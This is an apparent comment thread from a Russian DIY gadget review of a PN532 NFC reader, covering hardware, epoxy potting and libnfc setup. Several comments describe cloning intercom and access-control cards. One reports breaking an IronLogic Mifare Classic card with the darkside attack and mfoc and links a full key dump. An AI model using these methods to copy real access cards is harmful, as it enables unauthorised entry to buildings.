  • 10 января 2016, 23:04
+12
Похоже пора заворачивать бумажник в фольгу ))).

+
avatar
  • Oswald
  • 10 января 2016, 23:07
0
зона радиовидимости не большая, особенно на китайских mifare (антенна там маленькая) )))
+
avatar
  • al-open
  • 10 января 2016, 22:59
+2
Надо было UART плату снизу сделать
+
avatar
  • Ostin
  • 10 января 2016, 23:24
0
а вот такой ридер это не тоже самое?
+
avatar
0
Нет, это PC/SC, для работы с libnfc нужны костыли в виде pcscd-lite. Можно почитать тут nfc-tools.org/index.php?title=ACR122 и тут nfc-tools.org/index.php?title=Devices_compatibility_matrix

ACS ACR122 devices rely on PCSC which does not allow to cancel/abort a command, so all asynchronous commands (commands with delayed reply) could fail with timeouts, which makes ACR122's target support very limited and unstable.

Хотя для многих задач он вполне подходит.
+
avatar
  • drv
  • 11 января 2016, 00:23
0
ACR122 для всех типов атак подходит, главное знать где бубен лежит :) При хорошей производительности системы гарантировано дампит любой классик, даже не зная ключей. Время — от нескольких минут до нескольких часов.
+
avatar
  • Z2K
  • 11 января 2016, 00:31
0
майфери классик?
+
avatar
  • drv
  • 11 января 2016, 00:33
0
Да
+
avatar
  • Ostin
  • 11 января 2016, 01:18
0
я в этом деле профан ))
вот скажем… проверить на предмет безопасности карты оплаты общественного транспорта или парка аттракционов или горнолыжного курорта им можно?
+
avatar
+9
привет лепра
+
avatar
+4
Привет.

+
avatar
-1
здаров
+
avatar
0
Фамилию в HEX не затер :)
+
avatar
+1
видать автор надеялся на сознательность тех, кому по зубам хекс. и да, ему уже об этом сообщили :)
+
avatar
+5
c4 c0 20 cc cd c5 20 cf ce d5 d3 c9
+
avatar
  • Fover
  • 11 января 2016, 00:22
+2
CC C0 D2 20 CD C0 20 CC D3 D1 DC CA C5 20 C7 C0 CF D0 C5 D9 C5 CD
+
avatar
+1
CE C9 2C 20 C2 D1 A8 21 20 3A 29

PS. ну вот заставили таки вынуть свой запылившийся хекс редактор… а ведь не хотел… старый стал… не нужны мне ваши хексы. не нужны! )))
+
avatar
0
бравирование такими аргументами не по-джентельменски!
+
avatar
+6
это не бравирование. это, увы, констатация факта…
вот помню молодым был, писали с товарищем резидент на асме — из protected mode делали скриншоты в pcx :)… doom/doom2 и прочие «непробиваемые» игрушки… и ведь пробивало нормально на наши комбинации клавиш, и нереентабельность дос учитывали, ждали по прерываниям своей очереди…
а сейчас… увы… жена, дети, дом/работа/дом… никакого творчества, полёта мысли и свободного времени… и так много-много лет. разве, что по-стариковски тут побурчать малость…
+
avatar
0
я имел ввиду то, что написано в хексе ;)
+
avatar
0
и, да.
если этот же ник использовался и во времена программирования, то низкий поклон и большая благодарность. не раз меня выручали труды пользователя с таким ником.
+
avatar
0
судя по всему это был не я, т.к. под этим ником в паблик уходили только dos-крипторы.
+
avatar
  • AJACKS
  • 10 января 2016, 23:55
0
Интересно, а с помощью этого ридера, можно ли клонировать карты на болванки?
+
avatar
+1
Карты есть разные. Некоторые можно, другие можно только на специальные хитрые болванки. Некоторые совсем нельзя.
+
avatar
  • kastnu4
  • 10 января 2016, 23:59
0
А мне вот интересно, грубо говоря у нас в университете проходная, с помощью карт, насколько я понимаю, тоже NFC
Выходит, этим устройством можно считать сигнал карты, а потом залить его на другую карту, сделать копию?
+
avatar
  • Nemmox
  • 11 января 2016, 00:18
+1
Для этого на али, есть уже готовые изделия
+
avatar
  • kastnu4
  • 11 января 2016, 00:25
0
А можете ссылочку дать, или ключевые слова, как искать?
+
avatar
  • Nemmox
  • 11 января 2016, 00:28
+1
Вот для примера, набором, но дешевле, ридер отдельно ~4,50$, карты отдельно.
aliexpress.com/item/125khz-RFID-ID-EM-Card-Reader-Writer-Copier-Duplicater-T5557-EM4305-4200-with-5pcs-key-tag/32436872797.html
+
avatar
  • kastnu4
  • 11 января 2016, 00:31
0
Спасибо, нужно будет как-то попробовать. Выходит, это и домофонные ключи такой фигней можно делать?
+
avatar
  • Nemmox
  • 11 января 2016, 00:34
+1
Да, большинство, но не все.
Но как уже посоветовали ниже, проще в любой палатке металоремонт, сделают такую копию.
+
avatar
  • kastnu4
  • 11 января 2016, 00:43
+1
Самому играться веселее)
Спасибо за информацию
+
avatar
0
Да вам такую копию в любом ларьке «ключи домофонные» сделают. Все равно на обычную карточку копию не сделаете, они только для чтения.
+
avatar
+1
Во первых не обязательно у вас карта именно этого диапазона. Она вполне может быть низкочастотного диапазона 125khz. Я писал про детектор частотного диапазона ридера тут mySKU.me/blog/aliexpress/37063.html
Можно так же попробовать прочесть карту с помощью android смартфона с nfc, если карта не читается, значит другой диапазон.

этим устройством можно считать сигнал карты, а потом залить его на другую карту, сделать копию?
В большинстве случаев да, но так сложно ответить.
+
avatar
  • Z2K
  • 11 января 2016, 00:28
0
Для цитирования нажимайте символ ".
+
avatar
  • Z2K
  • 11 января 2016, 00:25
0
Точнее RFID?
+
avatar
+1
В системах контроля доступа обычно используют простейшие карты типа EM-Marine (как и в домофонах), которые содержат только цифровой идентификатор. Скопировать их нет никакой сложности — они без защиты. Такие карты и домофонные брелки работают на часоте 125кГц. Проездные, банковские карты и другие серьезные штуки используют защищаенные протоколы (mifare) и работают на частоте 13,56МГц.
+
avatar
0
Но копировать проездные обычно смысла нет, даже если это возможно. Данные о поездках синхронизируются с сервером, клоны карт будут легко обнаружены алгоритмом.
+
avatar
  • Oswald
  • 11 января 2016, 01:02
0
в метро возможно. там ридеры прицеплены к серверам.
в автобусах крайне маловероятно. ридеры в оффлайне, памяти под стоплисты мало.
+
avatar
0
Реализация может быть разная. В Минске валидаторы подключены к бортовому компьютеру с GSM.
+
avatar
0
Да? А как по вашему тогда карта тройка простите заимодействует?
В метро вошел- вышел, пересел на автобус и она списала по тарифу 90 минут.
Все автобусы давно уже на глонасе и взаимодействуют прекрасно.
+
avatar
  • lolipop
  • 12 января 2016, 00:31
0
а какая связь глонаса и ip-сети?
+
avatar
  • Z2K
  • 12 января 2016, 02:02
0
Ну как-бы, данные глонаса о местоположении и маршруте передаются на базу по какому-то каналу — скорее всего джсм. По нему же и карточные списания на сервер.
+
avatar
  • AL_Kur
  • 11 января 2016, 02:00
0
таким образом, любой подобраный в мусоре проездной служит неклонируемым ключом для СКД, если прописать его в системе?
+
avatar
0
ну, как-бы да. если никому в голову не придёт такой же идентификатор прописать вручную в системе

PS, ну почему не клонируемым? стоит вам на полчасика отдать/потерять/забыть этот носитель идентификатора, так заинтересованные лица найдут способ считать ID и сделать клон…
но, не забываем про Неуловимого Джо :)
если будете так разграничивать доступ к вашему сортиру на этаже, то вряд ли кто будет ломать вашу систему, если только сортир не в студенческой общаге :)
+
avatar
  • Hermit
  • 11 января 2016, 00:08
+1
Привет Lepra
+
avatar
  • bazis13
  • 11 января 2016, 01:32
+2
замурованный провод все портит. Надо было поставить хороший разъем, который нельзя сломать. Самое брутальное что приходит на ум — два xt-60. Но можно и аудио джеком четырехконтактным ограничится.
+
avatar
0
а чего сразу не XT90?
+
avatar
  • bazis13
  • 11 января 2016, 11:59
0
ваши варианты? Какой разъем можно залить смолой, и чтобы на века? Юсб выламываются за год-два.
+
avatar
0
я бы от макбука magsafe бы всандалил…
+
avatar
  • bazis13
  • 11 января 2016, 12:14
0
его почему-то сложно купить. Чтобы и папа и мама и дешево.
Мне тоже нравятся магнитные разъемы, но китайцы не делают их даже со своим дизайном.
+
avatar
0
сейчас пошли модные магнитные с microusb на подобие магсейфа
+
avatar
0
ага. и обзор на муське на них уже был.
обмен тянет, при заряде плавится.
+
avatar
  • LTW
  • 12 января 2016, 10:54
0
Уже недели три каждую ночь заряжаю, ничего не расплавилось. Ой, один раз у кого-то что-то случилось и все теперь? Обычные зарядки тоже иногда взрываются, что их теперь, тоже не использовать? Из трех испробованных на практике вариантов — обычная, беспроводная и магнитная, на данный момент мне магнитная больше всех нравится, особенно применительно к авто (дома разница менее ощутима).
+
avatar
0
суперский обзор, плюсую. Можно ли изменить данные на соцкарте?
+
avatar
  • sav13
  • 11 января 2016, 05:19
0
В данной технологии изготовления корпуса есть опасение, что со временем оборвется USB шнурок, особенно если эту штуку таскать и шнурок сматывать вокруг корпуса. А так хорошо получилось.

Не встречалось библиотек по Ардуино, способных организовать двухсторонний обмен по NFC с Android?
+
avatar
  • Stress
  • 11 января 2016, 06:16
0
Посту плюс, такое в журнал «Хакер» надо :)
+
avatar
+1
Прикольно выглядит, но вместо кабеля интереснее было бы microusb разъем внутрь залить.
+
avatar
  • Aloha_
  • 11 января 2016, 08:41
0
Перед залитием эпоксидкой надо было всю плату покрыть лаком а не только фигурку.

Если пузырьков планируется много, то можно «разжижить» эпоксидку заранее. Метанол (яд!), бензол, чистый этиловый спирт (наличие воды даст муть). Так же можно подогреть эпоксидку — станет более текучая (немного ускорит процесс отверждения, но на фоне суток это мелочи). Кстати, смысла нет держать на всякий случай двое суток. В любом количестве готовый эпоксидный клей застывает сутки (при правильных пропорциях компонентов).

Если есть доступ к вакуумному насосу, то удаление пузырьков вообще проблем не вызовет (малодоступно правда).
+
avatar
  • Z2K
  • 11 января 2016, 08:57
0
Зачем?
+
avatar
  • Aloha_
  • 11 января 2016, 09:04
0
Сталкивались с проблемой разрушения дорожек платы от взаимодействия с эпоксидкой. Возможно эпоксидка попадалась не качественная и (или) дорожки более тонкие (производитель сэкономил на меди) В любом случае по прошествии нескольких лет проблемы вылезали. По крайней мере хуже не будет уже.
+
avatar
  • Z2K
  • 11 января 2016, 09:16
0
Ну, технологии герметизации и заливки разными эпоксидными материалами РЭА в СССР использовали широко и давно. Особенно в военке, и такая технология хорошо отработана и для широкого допустимого термического диапазона. Просто должны быть соответсвующие наполнители повышающие тепропроводимость и уменьшающие КТР эпоксидного наполнителя-герметика. И ничего рвать не будет. Но и красоты не будет.
+
avatar
  • ewavr
  • 11 января 2016, 09:31
0
Если есть доступ к вакуумному насосу, то удаление пузырьков вообще проблем не вызовет (малодоступно правда).
Почему малолоступно? Насос, трубки, манометр можно использовать те же, что для заправки кондиционеров. Недавно покупали как раз, нужно было масло трансформаторное обезгаживать.
+
avatar
  • Z2K
  • 11 января 2016, 09:37
0
Да, не так уж и сложно.
+
avatar
  • les3685
  • 11 января 2016, 14:09
+2
обезгаживать
конечно улыбнуло. Я бы написал дегазировать.
+
avatar
+2
Это если оно газированное.
А если оно загаженное? )))
+
avatar
  • AlexZZZ
  • 11 января 2016, 09:37
0
Я как то флешку залил эпоксидкой и после этого она перестала работать. Помогла только перепрошивка контроллера.
+
avatar
0
из фоток не совсем понятно, плата на чем-то стоит для ровного позиционирования внутри эпоксидки?
+
avatar
+1
Нет, сперва был залит первый слой эпоксидки, до половины формы, на него положена плата и после залита снова. Я уже и забыл об этом, добавлю в статью.
+
avatar
  • mcshel
  • 11 января 2016, 10:05
0
Я уже давно облизываюсь на такой NFC Reader, подскажите стоит брать? тут в комплекте сразу UART идет.

ebay.com/itm/161292573998
+
avatar
+1
Это вроде то же самое что и мой, только непонятно что за чип отдельный на плате помимо самого pn532.

А еще я не заметил что в комплекте идет uart и там кстати high speed uart, имейте в виду.
Package includes one PN532 NFC module, one white S50 card, one S50 key card.
+
avatar
0
я подозреваю что это что-то вроде LCX245 — конвертер логических уровней
+
avatar
+1
А, ну да, они пишут

We added the 3.3V-5V logic level converter circuit on this board.
+
avatar
  • mcshel
  • 11 января 2016, 10:27
0
А не FTDI разве?

There is a FTDI interface to connect with the FTDI cable, a I2C port which is convenient to use.
Картинок в большем разрешении нет, вот я и жду отзывы, а так штука прикольная, можно ломать бесконтактные ключи от домофона без Arduino, если конечно UART там есть свой.
+
avatar
0
Нет, в списке интерфейсов «Interface: I2C, SPI, HSU(3.3V-5V compatible)»

Плюс написано «There is a FTDI interface to connect with the FTDI cable»
Под FTDI-кабелем они обычно подразумевают кабель с FTDI в USB-разъеме.
+
avatar
0
Здесь имеется в виду, что на плате есть UART интерфейс к которому можно подключиться FTDI кабелем, сам кабель в комплекте не идет.

можно ломать бесконтактные ключи от домофона без Arduino
В большинстве домофонов ключи диапазона 125khz которые не будут работать с этим ридером.
+
avatar
  • dobskiy
  • 11 января 2016, 13:02
+1
А Ironlogic защищенный с его помощью поломать можно? Там 13,56 мгц и шифрованный раздел.
+
avatar
+1
Что ж, давайте проверим, благо интеграторы IronLogic работают в соседнем офисе. Беглый тест показал что дефолтных ключей нет ни в одном секторе карты объекта.

Сами IronLogic уверяют что их карта защищена и скопировать ее уж точно нельзя.

Буду писать по ходу эксперимента.
+
avatar
  • dobskiy
  • 11 января 2016, 13:58
0
Какая у вас красивая карта объекта :). У меня просто белая болванка и брелочек.
+
avatar
+3
Тип карты обычный Mifare Classic 1k.

Итак не смотря на то, что ни один сектор на карте не был закрыт дефолтным ключом, удалось применить атаку darkside и восстановить ключ от нулевого сектора.

Дальше используя mfoc карта была полностью сдампана. Выкладываю полный дамп с ключами pastebin.com/raw/2E2XCx0Z

После чего не составило труда скопировать карту на волшебную болванку с изменяемым UID. Вот такой «защищенный» IronLogic.
+
avatar
+1
Замечу, что все это атаки уровня деского сада, которые по сей день достаточно эффективны. Помимо них существуют более изощренные манимуляции, вроде снифинга, проксирования обмена между картой и ридером и активные атаки на ридер без наличия самой карты на руках.
+
avatar
  • mcshel
  • 12 января 2016, 18:49
0
Еще раз, я смогу подключить к нему USB кабель и без переходника он у меня в ОС определиться как COM порт?
+
avatar
0
TTL адаптер (красный маленький) определяется как COM-порт. Без TTL адаптера вы его не подключите к кому. Можно использовать ардуину и I2C/SPI.
+
avatar
  • admin
  • 13 января 2016, 05:58
0
мда :)) не долго ironLogic продержался, целых 43 минуты
+
avatar
  • p0rsche
  • 11 января 2016, 13:25
0
Как DIY обзор — зачот, ловите плюсандий!
Единственный момент — на текущий момент немногим более дорогой, но фабричный ACR122U с USB драйвером делает то же самое ведь (команды abort и выставление таймингов). Стоит 30 долларов. Если у вас есть опыт, расскажите. Про «извращенский софт» — вы имеете ввиду редактирование raw фреймов, идущих в PN532? Ну и про mifare darkside, конечно, молчком, ибо не всегда ключики стандартные в блоках есть, а жить как-то надо :)
+
avatar
0
ого, а я уже и забыл как полгода назад у одной барышни в инсте видел это чудо изделие ;)
+
avatar
-2
За «рукоблудство» 5+, за целесообразность… у многих телефон умеет делать тоже самое, а если не видно разницы, то нафига козе второй баян?
+
avatar
  • p0rsche
  • 15 января 2016, 20:18
+1
К сожалению, добрая половина телефонов не будет читать карты с чипом от NXP (то бишь Mifare) и все потому, что у телефонов чип от Broadcom по-моему, который реализует стандарты NFC Forum, тогда как для поддержки Mifare ставят чипы от NXP. Пусть меня поправят, но в этом и соль. Мои Nexus 4 и Nexus 6 не читают Mifare тэги :(
+
avatar
0
Все верно, но я не пытаюсь разубеждать таких комментаторов, потому что весь их опыт использования NFC технологий заканчивается прочтением аббревиатуры в спецификациях телефона.
+
avatar
0
Недавно встроил в ноут nfc ридер, только взял cp2102 в qfn (и подпаялся к контактам мгтфом) и модуль с pn532 от сидстудио — самый мелкий вообще какой бывает (т.к. внешняя антенна), кстати.
+
avatar
  • p0rsche
  • 15 января 2016, 20:13
+1
Статью в студию :) хочу в свой старенький eee pc 901 тоже впаять
+
avatar
+1
ну я в комментарий все уложил xD
лежала cp2102 в qfn-корпусе, подпаялся к ней 0.07 МГТФ (пришлось выпусывать половину жилок из каждого провода, т.к. слишком толстый оказался), залил в термоклей (китайские сопли)
Нашел доки на материнку в ноуте (acer aspire v3-571g), нашел не распаянный юсб на ней, подпаял usb cp2102 к нему. +5вольт взял из одного из разъемов на плате.
Купил www.seeedstudio .com/wiki /Grove_%EF%BC%8D_NFC в ближайшем магазине за 1139рэ (на 20.09.2015, сейчас там уже куда больше), сдул феном дурацкий разъем для фирменного сидовского провода и припаял к cp2102. Антенну и вообще все закрепил двухсторонним скотчем в корпусе ноута.
фотки в ин100граме:
www.instagram .com/ p/7-0PwcuZBU/
www.instagram .com/ p/8ADH3OOZGo/
www.instagram .com/ p/8ATAZYuZJF/
+
avatar
+1
навесной монтаж qfn — изврат, если есть место в корпусе для платы он — лишняя трата времени
+
avatar
  • spy686
  • 17 января 2016, 13:16
0
Автор, крутой спец!!!
+
avatar
  • PRoffR
  • 22 января 2016, 10:53
0
Известия использовали фотографии автора статьи. При этом указаноФото предоставлено Zecurion. В статье описано про мошенничество с использованием данного прибора.
+
avatar
+1
Ухты, спасибо.
+
avatar
  • AndreyZ
  • 22 января 2016, 14:18
0
Только хотел написать))
+
avatar
  • 4ishops
  • 23 января 2016, 16:57
0
Вместо PN532 можно использовать RC522? есть какие-то ограничения на железо?
+
avatar
0
Нет. Конеш есть ограничения. RC522 «из коробки» в libnfc не заработает, и подключается не по uart.
Терзайте гугл.
+
avatar
  • Ultras
  • 25 января 2016, 12:25
0
izvestia.ru/news/602196

Кто-то использовал фотки из этого обзора :-)


Updated: опоздал, не заметил выше.

Автор, подай в суд :-)
+
avatar
  • kipbmk
  • 31 января 2016, 20:42
0
Для заливки можно использовать «POLYMORPH», если что, можно плату невредимой для ремонта достать.
+
avatar
0
Вы пробовали что-то заливать поликопролактоном?
+
avatar
  • raum01
  • 27 марта 2017, 14:37
0
Что-то не получается подключить PN532 + UARTCP2102
проводки соединил — в ноут вставил а mfoc не видит
про процедуру подключения подскажите где можно прочесть
спасибо!
+
avatar
0
перемычки поставили на самом ридере? RX/TX местами менять пробовали?
+
avatar
  • raum01
  • 27 марта 2017, 15:24
0
перемычки поставил — соединил вроде правильно все — попробую поменять RX/TX.
+
avatar
  • raum01
  • 27 марта 2017, 18:18
0
Kali linux поддерживает по умолчанию?
+
avatar
0
>Kali linux поддерживает по умолчанию?

да

Фото подключения и перемычек в студи. Еще вывод dmesg при подключении адаптера и конфиг libnfc.conf
+
avatar
  • raum01
  • 29 марта 2017, 12:06
0
все залил сюда

mega.nz/#F!cIknSbQY!hnhICweohnZc7J8UlCKv0Q
+
avatar
  • duloz
  • 24 мая 2017, 23:24
0
Аж зарегистрироваться пришлось. Думаю вопрос решен, но все же. В свое время тоже потратил на него время. В файле libnfc.conf необходимо прописать настройки конфигурации, в соответствии с https://nfc-tools.org/index.php?title=Libnfc:configuration. Т.е. Для модуля представленного в статье строка будет pn532_uart:/dev/ttyUSB0:115200
+
avatar
0
Сможете такую штукенцию мне сварганить за деньги? у самого руки из одного места растут. все расходы беру на себя